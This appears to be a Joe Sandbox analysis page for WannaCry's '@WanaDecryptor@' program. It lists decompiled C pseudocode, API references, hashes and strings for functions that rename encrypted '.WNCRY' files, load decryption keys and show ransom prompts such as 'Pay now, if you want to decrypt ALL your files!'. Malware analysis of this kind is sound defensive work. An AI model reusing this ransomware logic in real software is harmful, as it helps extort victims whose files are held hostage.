                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2385$#537$MessageSend$#3092#6199#800
                                                      • String ID: Connected$Received response$Sent request$Succeed
                                                      • API String ID: 3790904636-3692714192
                                                      • Opcode ID: 77cbd13b205d5b60acded2d534e2f67ef19f14b7a7dcd1ce5799653af05fca91
                                                      • Instruction ID: e9690c31fbc1831b63af9a5cc079f352e9ea826ed21b4fe1124c0ccffc889961
                                                      • Opcode Fuzzy Hash: 77cbd13b205d5b60acded2d534e2f67ef19f14b7a7dcd1ce5799653af05fca91
                                                      • Instruction Fuzzy Hash: A631E8B130430067C5209F1AD959EAF7B69EBD4BB4F10852FF149A33D1CA795C4582FA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404DD0 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 89windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 78%
                                                      			E00404DD0(void* __ecx) {
				intOrPtr _t12;
				long _t13;
				struct HFONT__* _t15;
				long _t16;
				long _t17;
				int _t29;
				int _t32;
				int _t35;

				L00412CB0();
				_t12 =  *0x42189c; // 0x0
				_t13 =  *(_t12 + 0x824);
				 *(__ecx + 0x6c) = _t13;
				_push(CreateSolidBrush(_t13));
				L00412D5E();
				_t35 = __ecx + 0x70;
				_t15 = CreateFontA(0x10, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial");
				_push(_t15);
				L00412D5E();
				_push(0x403);
				L00412CE6();
				if(_t35 != 0) {
					_t29 =  *(_t35 + 4);
				} else {
					_t29 = 0;
				}
				_t16 = SendMessageA( *(_t15 + 0x20), 0x30, _t29, 1);
				_push(1);
				L00412CE6();
				if(_t35 != 0) {
					_t32 =  *(_t35 + 4);
				} else {
					_t32 = 0;
				}
				_t17 = SendMessageA( *(_t16 + 0x20), 0x30, _t32, 1);
				_push(2);
				L00412CE6();
				if(_t35 != 0) {
					SendMessageA( *(_t17 + 0x20), 0x30,  *(_t35 + 4), 1);
					return 1;
				} else {
					SendMessageA( *(_t17 + 0x20), 0x30, _t35, 1);
					return 1;
				}
			}











                                                      0x00404dd5
                                                      0x00404dda
                                                      0x00404ddf
                                                      0x00404de6
                                                      0x00404def
                                                      0x00404df3
                                                      0x00404e1a
                                                      0x00404e1d
                                                      0x00404e23
                                                      0x00404e26
                                                      0x00404e2b
                                                      0x00404e32
                                                      0x00404e39
                                                      0x00404e3f
                                                      0x00404e3b
                                                      0x00404e3b
                                                      0x00404e3b
                                                      0x00404e51
                                                      0x00404e53
                                                      0x00404e57
                                                      0x00404e5e
                                                      0x00404e64
                                                      0x00404e60
                                                      0x00404e60
                                                      0x00404e60
                                                      0x00404e70
                                                      0x00404e72
                                                      0x00404e76
                                                      0x00404e7d
                                                      0x00404e9f
                                                      0x00404ea9
                                                      0x00404e7f
                                                      0x00404e88
                                                      0x00404e92
                                                      0x00404e92

                                                      APIs
                                                      • #4710.MFC42 ref: 00404DD5
                                                      • CreateSolidBrush.GDI32(?), ref: 00404DE9
                                                      • #1641.MFC42(00000000), ref: 00404DF3
                                                      • CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00404E1D
                                                      • #1641.MFC42(00000000), ref: 00404E26
                                                      • #3092.MFC42(00000403,00000000), ref: 00404E32
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E51
                                                      • #3092.MFC42(00000001), ref: 00404E57
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E70
                                                      • #3092.MFC42(00000002), ref: 00404E76
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E88
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E9F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#3092$#1641Create$#4710BrushFontSolid
                                                      • String ID: Arial
                                                      • API String ID: 1126252797-493054409
                                                      • Opcode ID: 1de1fe04c409b87552040b023bf9e037168031db0fca800ba09ccd0f6b59f890
                                                      • Instruction ID: f8dd995afa615cab71677879a74d6ff7c2e305333cbfc3da3be905e2a6067967
                                                      • Opcode Fuzzy Hash: 1de1fe04c409b87552040b023bf9e037168031db0fca800ba09ccd0f6b59f890
                                                      • Instruction Fuzzy Hash: CC21C6B13507107FE625A764DD86FAA2759BBC8B40F10011EB345AB2D1CAF5EC41879C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406DC0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 103windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 64%
                                                      			E00406DC0(void* __ecx) {
				int _v76;
				int _v80;
				char _v84;
				int _v88;
				long _v92;
				void* _v96;
				int _v100;
				void* _v104;
				long _t28;
				void* _t29;
				struct HWND__* _t30;
				int _t32;
				void* _t35;
				int _t39;
				long _t47;
				int _t48;
				void* _t51;

				_t35 = __ecx;
				_t48 = 0;
				_t28 = SendMessageA( *(__ecx + 0x4e0), 0xe, 0, 0);
				_t47 = _t28;
				_v96 = 0;
				_v92 = _t47;
				_t4 = _t47 + 1; // 0x1
				L00412CEC();
				_t51 =  &_v104 + 4;
				_v88 = _t28;
				if(_t28 == 0) {
					return _t28;
				}
				_t29 = _t35 + 0x4c0;
				if(_t29 != 0) {
					_t30 =  *(_t29 + 0x20);
				} else {
					_t30 = 0;
				}
				SendMessageA(_t30, 0x44b, _t48,  &_v96);
				_t32 = _v88;
				 *((char*)(_t32 + _t47)) = 0;
				if(_t47 < 0) {
					L15:
					_push(_v88);
					L00412C98();
					return _t32;
				} else {
					do {
						__imp___strnicmp(_t48 + _v88, "<http://", 8);
						_t51 = _t51 + 0xc;
						if(_t32 == 0) {
							L7:
							_t48 = _t48 + 1;
							_t39 = _t48;
							if(_t48 > _t47) {
								goto L14;
							}
							_t32 = _v88;
							while( *((char*)(_t48 + _t32)) != 0x3e) {
								_t48 = _t48 + 1;
								if(_t48 <= _t47) {
									continue;
								}
								goto L14;
							}
							_t32 = _t48;
							_t48 = _t48 + 1;
							if(_t32 != 0xffffffff) {
								_v100 = _t32;
								_v104 = _t39;
								SendMessageA( *(_t35 + 0x4e0), 0x437, 0,  &_v104);
								_t32 = 0x20;
								_push( &_v84);
								_v84 = 0x54;
								_v76 = 0x20;
								_v80 = 0x20;
								L00412F4A();
							}
							goto L14;
						}
						_t32 = _v88;
						__imp___strnicmp(_t48 + _t32, "<https://", 9);
						_t51 = _t51 + 0xc;
						if(_t32 != 0) {
							goto L14;
						}
						goto L7;
						L14:
						_t48 = _t48 + 1;
					} while (_t48 <= _t47);
					goto L15;
				}
			}




















                                                      0x00406dcc
                                                      0x00406dce
                                                      0x00406ddc
                                                      0x00406dde
                                                      0x00406de0
                                                      0x00406de4
                                                      0x00406de8
                                                      0x00406dec
                                                      0x00406df1
                                                      0x00406df6
                                                      0x00406dfa
                                                      0x00406ee6
                                                      0x00406ee6
                                                      0x00406e00
                                                      0x00406e08
                                                      0x00406e0e
                                                      0x00406e0a
                                                      0x00406e0a
                                                      0x00406e0a
                                                      0x00406e1d
                                                      0x00406e1f
                                                      0x00406e25
                                                      0x00406e29
                                                      0x00406ed2
                                                      0x00406ed6
                                                      0x00406ed7
                                                      0x00000000
                                                      0x00406e2f
                                                      0x00406e2f
                                                      0x00406e3e
                                                      0x00406e44
                                                      0x00406e49
                                                      0x00406e67
                                                      0x00406e67
                                                      0x00406e6a
                                                      0x00406e6c
                                                      0x00000000
                                                      0x00000000
                                                      0x00406e6e
                                                      0x00406e72
                                                      0x00406e78
                                                      0x00406e7b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00406e7d
                                                      0x00406e7f
                                                      0x00406e81
                                                      0x00406e85
                                                      0x00406e8b
                                                      0x00406e9e
                                                      0x00406ea2
                                                      0x00406ea8
                                                      0x00406ead
                                                      0x00406eb4
                                                      0x00406ebc
                                                      0x00406ec0
                                                      0x00406ec4
                                                      0x00406ec4
                                                      0x00000000
                                                      0x00406e85
                                                      0x00406e4b
                                                      0x00406e5a
                                                      0x00406e60
                                                      0x00406e65
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00406ec9
                                                      0x00406ec9
                                                      0x00406eca
                                                      0x00000000
                                                      0x00406e2f

                                                      APIs
                                                      • SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 00406DDC
                                                      • #823.MFC42(00000001,?,?), ref: 00406DEC
                                                      • SendMessageA.USER32(?,0000044B,00000000,?), ref: 00406E1D
                                                      • _strnicmp.MSVCRT ref: 00406E3E
                                                      • _strnicmp.MSVCRT ref: 00406E5A
                                                      • SendMessageA.USER32(?,00000437,00000000,?), ref: 00406EA2
                                                      • #6136.MFC42 ref: 00406EC4
                                                      • #825.MFC42(?), ref: 00406ED7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$_strnicmp$#6136#823#825
                                                      • String ID: <http://$<https://$T
                                                      • API String ID: 1228111698-1216084165
                                                      • Opcode ID: e226602ddc61248ba8de4c220f9c6f0969af954b0c2e6c7ec46426c0281c0da6
                                                      • Instruction ID: 32e461136b03d60599108953de6477053a568cccd29e118696d71e5d9ed076ef
                                                      • Opcode Fuzzy Hash: e226602ddc61248ba8de4c220f9c6f0969af954b0c2e6c7ec46426c0281c0da6
                                                      • Instruction Fuzzy Hash: 7E31D6B52043509BD320CF18CC41FABB7E4BB98704F044A3EF98AD7281E678D95987D9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00402560 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 81fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 72%
                                                      			E00402560(intOrPtr __ecx, WCHAR* _a4) {
				short _v720;
				intOrPtr _v724;
				void* _t21;
				void* _t22;
				WCHAR* _t23;
				void* _t30;
				short* _t31;
				intOrPtr* _t32;
				void* _t34;
				void* _t36;

				_t23 = _a4;
				_v724 = __ecx;
				_t30 = 0;
				wcscpy( &_v720, _t23);
				_t31 = wcsrchr( &_v720, 0x2e);
				_t34 =  &_v724 + 0x10;
				if(_t31 == 0) {
					L4:
					wcscat( &_v720, L".org");
				} else {
					_t32 = __imp___wcsicmp;
					_t21 =  *_t32(_t31, L".WNCRY");
					_t36 = _t34 + 8;
					if(_t21 == 0) {
						L3:
						 *_t31 = 0;
						_t30 = 1;
					} else {
						_t22 =  *_t32(_t31, L".WNCYR");
						_t34 = _t36 + 8;
						if(_t22 != 0) {
							goto L4;
						} else {
							goto L3;
						}
					}
				}
				if(E004020A0(_v724, _t23,  &_v720) == 0) {
					DeleteFileW( &_v720);
					goto L11;
				} else {
					if(DeleteFileW(_t23) == 0) {
						L11:
						return 0;
					} else {
						if(_t30 != 0) {
							return 1;
						} else {
							return MoveFileW( &_v720, _t23);
						}
					}
				}
			}













                                                      0x00402567
                                                      0x00402576
                                                      0x0040257b
                                                      0x0040257d
                                                      0x00402590
                                                      0x00402592
                                                      0x00402597
                                                      0x004025c9
                                                      0x004025d3
                                                      0x00402599
                                                      0x00402599
                                                      0x004025a5
                                                      0x004025a7
                                                      0x004025ac
                                                      0x004025bd
                                                      0x004025bd
                                                      0x004025c2
                                                      0x004025ae
                                                      0x004025b4
                                                      0x004025b6
                                                      0x004025bb
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004025bb
                                                      0x004025ac
                                                      0x004025ed
                                                      0x0040262e
                                                      0x00000000
                                                      0x004025ef
                                                      0x004025f8
                                                      0x00402637
                                                      0x00402640
                                                      0x004025fa
                                                      0x004025fc
                                                      0x00402626
                                                      0x004025fe
                                                      0x00402614
                                                      0x00402614
                                                      0x004025fc
                                                      0x004025f8

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Delete_wcsicmp$Movewcscatwcscpywcsrchr
                                                      • String ID: .WNCRY$.WNCYR$.org
                                                      • API String ID: 1016768320-4283512309
                                                      • Opcode ID: ca6531dd56d56dd65b8b31a4033326b7c97dce23bd12cfbd58547a94a49b2b6f
                                                      • Instruction ID: 8e688c7c8c2018b5eb76f9bfe5eaf8fc18d5300b1d9ff01e022ce9e0f1e53e02
                                                      • Opcode Fuzzy Hash: ca6531dd56d56dd65b8b31a4033326b7c97dce23bd12cfbd58547a94a49b2b6f
                                                      • Instruction Fuzzy Hash: 29219576240301ABD220DB15FE49BEB7799DBD4711F44483BF901A2280EB7DD90987BE
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00413102 Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 80%
                                                      			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t23;
				intOrPtr* _t24;
				void* _t27;
				void _t29;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t61;

				_push(0xffffffff);
				_push(0x41baa8);
				_push(0x413050);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x422298 =  *0x422298 | 0xffffffff;
				 *0x42229c =  *0x42229c | 0xffffffff;
				_t23 = __p__fmode();
				_t46 =  *0x42228c; // 0x0
				 *_t23 = _t46;
				_t24 = __p__commode();
				_t47 =  *0x422288; // 0x0
				 *_t24 = _t47;
				 *0x422294 = _adjust_fdiv;
				_t27 = E004133C7( *_adjust_fdiv);
				_t61 =  *0x421790; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E004133C4);
				}
				E004133B2(_t27);
				_push(0x41f018);
				_push(0x41f014);
				L004133AC();
				_t29 =  *0x422284; // 0x0
				_v112 = _t29;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x422280,  &_v112);
				_push(0x41f010);
				_push(0x41f000);
				L004133AC();
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while( *_t55 > 0x20) {
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_t40 = E004133E6(GetModuleHandleA(0), _t39, 0, _t55, _t38);
				_v108 = _t40;
				exit(_t40);
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L004133A6();
				return _t41;
			}





























                                                      0x00413105
                                                      0x00413107
                                                      0x0041310c
                                                      0x00413117
                                                      0x00413118
                                                      0x00413125
                                                      0x0041312a
                                                      0x0041312f
                                                      0x00413136
                                                      0x0041313d
                                                      0x00413144
                                                      0x0041314a
                                                      0x00413150
                                                      0x00413152
                                                      0x00413158
                                                      0x0041315e
                                                      0x00413167
                                                      0x0041316c
                                                      0x00413171
                                                      0x00413177
                                                      0x0041317e
                                                      0x00413184
                                                      0x00413185
                                                      0x0041318a
                                                      0x0041318f
                                                      0x00413194
                                                      0x00413199
                                                      0x0041319e
                                                      0x004131b7
                                                      0x004131bd
                                                      0x004131c2
                                                      0x004131c7
                                                      0x004131d4
                                                      0x004131d6
                                                      0x004131dc
                                                      0x00413218
                                                      0x0041321d
                                                      0x0041321e
                                                      0x0041321e
                                                      0x004131de
                                                      0x004131de
                                                      0x004131de
                                                      0x004131df
                                                      0x004131e2
                                                      0x004131e4
                                                      0x004131ef
                                                      0x004131f1
                                                      0x004131f1
                                                      0x004131f2
                                                      0x004131f2
                                                      0x004131ef
                                                      0x004131f5
                                                      0x004131f9
                                                      0x00000000
                                                      0x00000000
                                                      0x004131ff
                                                      0x00413206
                                                      0x00413210
                                                      0x00413225
                                                      0x00413212
                                                      0x00413212
                                                      0x00413212
                                                      0x00413231
                                                      0x00413236
                                                      0x0041323a
                                                      0x00413240
                                                      0x00413245
                                                      0x00413247
                                                      0x0041324a
                                                      0x0041324b
                                                      0x0041324c
                                                      0x00413253

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                      • String ID:
                                                      • API String ID: 801014965-0
                                                      • Opcode ID: 9f29f74fa0ca4091ce937db24ce742eca73e17089ce00c114469281514e7078a
                                                      • Instruction ID: fcecf6e401754473f6225594f41014142e7d5ca2867d00c097f2044c16acc313
                                                      • Opcode Fuzzy Hash: 9f29f74fa0ca4091ce937db24ce742eca73e17089ce00c114469281514e7078a
                                                      • Instruction Fuzzy Hash: F9419F71940308EFCB20DFA4DC45AE97BB9EB09711B20016FF855972A1D7788A81CB6C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404280 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 51windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 82%
                                                      			E00404280(void* __ecx, char _a8) {
				void* _t9;
				struct HWND__* _t10;
				long _t12;
				long* _t22;
				void* _t24;

				_t24 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x5a)) == 0) {
					E00404530(__ecx);
				}
				_t9 = E004045E0(_t24,  &_a8);
				if(_t9 == 0) {
					L6:
					L00412CBC();
					return _t9;
				} else {
					_t22 = _t24 + 0x44;
					_push(0);
					_push("mailto:");
					L00412DB2();
					if(_t9 != 0) {
						_t9 = ShellExecuteA(0, "open",  *_t22, 0, 0, 1);
						goto L6;
					} else {
						_t10 = GetParent( *(_t24 + 0x20));
						_push(_t10);
						L00412DAC();
						_t12 = SendMessageA( *(_t10 + 0x20), 0x1388,  *(_t24 + 0x20),  *_t22);
						L00412CBC();
						return _t12;
					}
				}
			}








                                                      0x00404281
                                                      0x00404289
                                                      0x0040428b
                                                      0x0040428b
                                                      0x00404297
                                                      0x0040429e
                                                      0x004042fd
                                                      0x004042ff
                                                      0x00404306
                                                      0x004042a0
                                                      0x004042a0
                                                      0x004042a3
                                                      0x004042a5
                                                      0x004042ac
                                                      0x004042b3
                                                      0x004042f7
                                                      0x00000000
                                                      0x004042b5
                                                      0x004042bb
                                                      0x004042c1
                                                      0x004042c2
                                                      0x004042d5
                                                      0x004042dd
                                                      0x004042e4
                                                      0x004042e4
                                                      0x004042b3

                                                      APIs
                                                      • #6663.MFC42(mailto:,00000000,?), ref: 004042AC
                                                      • GetParent.USER32(?), ref: 004042BB
                                                      • #2864.MFC42(00000000), ref: 004042C2
                                                      • SendMessageA.USER32(?,00001388,?,?), ref: 004042D5
                                                      • #2379.MFC42 ref: 004042DD
                                                        • Part of subcall function 00404530: #289.MFC42 ref: 0040455F
                                                        • Part of subcall function 00404530: #5789.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004137C8), ref: 00404574
                                                        • Part of subcall function 00404530: GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040458D
                                                        • Part of subcall function 00404530: #5789.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004045A6
                                                        • Part of subcall function 00404530: #613.MFC42 ref: 004045BB
                                                      • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004042F7
                                                      • #2379.MFC42(?), ref: 004042FF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2379#5789$#2864#289#613#6663ExecuteExtentMessageParentPoint32SendShellText
                                                      • String ID: mailto:$open
                                                      • API String ID: 1144735033-2326261162
                                                      • Opcode ID: 5760831a2f2f2ca95af973a0ffa58b3d14cd67dec606a23a37973cc095c9dbd7
                                                      • Instruction ID: 92cf742add8d60ef6c93fe1e72e53283c618a6078d8cf76be364cef0d5edaefa
                                                      • Opcode Fuzzy Hash: 5760831a2f2f2ca95af973a0ffa58b3d14cd67dec606a23a37973cc095c9dbd7
                                                      • Instruction Fuzzy Hash: AC0175753003106BD624A761ED46FEF7369AFD4B55F40046FFA41A72C1EAB8A8428A6C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004038F0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 84windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 70%
                                                      			E004038F0(void* __ecx, void* __ebp) {
				long _v4;
				intOrPtr _v16;
				char _v1252;
				char _v1284;
				void* __edi;
				int _t20;
				int _t23;
				void* _t30;
				long _t48;
				void* _t50;
				intOrPtr _t53;
				void* _t54;

				_push(0xffffffff);
				_push(E0041367B);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t53;
				_t54 = _t53 - 0x4f8;
				_t50 = __ecx;
				E00403EB0( *[fs:0x0], __ecx, 0);
				_t20 = SendMessageA( *(_t50 + 0xc0), 0x147, 0, 0);
				if(_t20 != 0xffffffff) {
					_t48 = SendMessageA( *(_t50 + 0xc0), 0x150, _t20, 0);
					_t57 =  *((intOrPtr*)(_t48 + 8));
					if( *((intOrPtr*)(_t48 + 8)) == 0) {
						E00403AF0(_t48, __ebp);
					}
					E00401E90( &_v1252, _t57);
					_v4 = 0;
					sprintf( &_v1284, "%08X.dky",  *((intOrPtr*)(_t48 + 8)));
					_t54 = _t54 + 0xc;
					if(E00402020( &_v1252,  &_v1284, E00403810, 0) != 0) {
						_t30 = E00403A20( &_v1252, _t48);
						__eflags = _t30;
						if(_t30 != 0) {
							_push(0);
							_push(0x40);
							_push("All your files have been decrypted!");
							goto L8;
						}
					} else {
						if( *((intOrPtr*)(_t48 + 8)) == 0) {
							_push(0);
							_push(0x40);
							_push("Pay now, if you want to decrypt ALL your files!");
							L8:
							L00412CC8();
						}
					}
					_v4 = 0xffffffff;
					_t20 = E00401F30( &_v1252);
				}
				E00403EB0(_t20, _t50, 1);
				_t23 = CloseHandle( *(_t50 + 0xf4));
				 *(_t50 + 0xf4) = 0;
				 *[fs:0x0] = _v16;
				return _t23;
			}















                                                      0x004038f6
                                                      0x004038f8
                                                      0x004038fd
                                                      0x004038fe
                                                      0x00403905
                                                      0x0040390d
                                                      0x00403911
                                                      0x0040392c
                                                      0x00403931
                                                      0x00403948
                                                      0x0040394d
                                                      0x0040394f
                                                      0x00403953
                                                      0x00403953
                                                      0x0040395c
                                                      0x0040396f
                                                      0x0040397a
                                                      0x00403980
                                                      0x0040399a
                                                      0x004039b6
                                                      0x004039bb
                                                      0x004039bd
                                                      0x004039bf
                                                      0x004039c1
                                                      0x004039c3
                                                      0x00000000
                                                      0x004039c3
                                                      0x0040399c
                                                      0x004039a1
                                                      0x004039a3
                                                      0x004039a5
                                                      0x004039a7
                                                      0x004039c8
                                                      0x004039c8
                                                      0x004039c8
                                                      0x004039a1
                                                      0x004039d1
                                                      0x004039dc
                                                      0x004039dc
                                                      0x004039e5
                                                      0x004039f1
                                                      0x004039fe
                                                      0x00403a0a
                                                      0x00403a17

                                                      APIs
                                                        • Part of subcall function 00403EB0: #3092.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EBE
                                                        • Part of subcall function 00403EB0: #2642.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EC5
                                                        • Part of subcall function 00403EB0: #3092.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED2
                                                        • Part of subcall function 00403EB0: #2642.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED9
                                                        • Part of subcall function 00403EB0: #3092.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EE3
                                                        • Part of subcall function 00403EB0: #2642.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EEA
                                                      • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040392C
                                                      • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00403946
                                                      • sprintf.MSVCRT ref: 0040397A
                                                      • #1200.MFC42(All your files have been decrypted!,00000040,00000000,?,00000000,?), ref: 004039C8
                                                        • Part of subcall function 00403AF0: fopen.MSVCRT ref: 00403B17
                                                        • Part of subcall function 00403A20: GetLogicalDrives.KERNEL32 ref: 00403A35
                                                        • Part of subcall function 00403A20: GetDriveTypeW.KERNEL32 ref: 00403A7A
                                                        • Part of subcall function 00403A20: GetDiskFreeSpaceExW.KERNEL32(0000005C,?,0000005C,?), ref: 00403A95
                                                      • CloseHandle.KERNEL32(?,00000001), ref: 004039F1
                                                      Strings
                                                      • %08X.dky, xrefs: 00403969
                                                      • Pay now, if you want to decrypt ALL your files!, xrefs: 004039A7
                                                      • All your files have been decrypted!, xrefs: 004039C3
                                                      Memory Dump Source
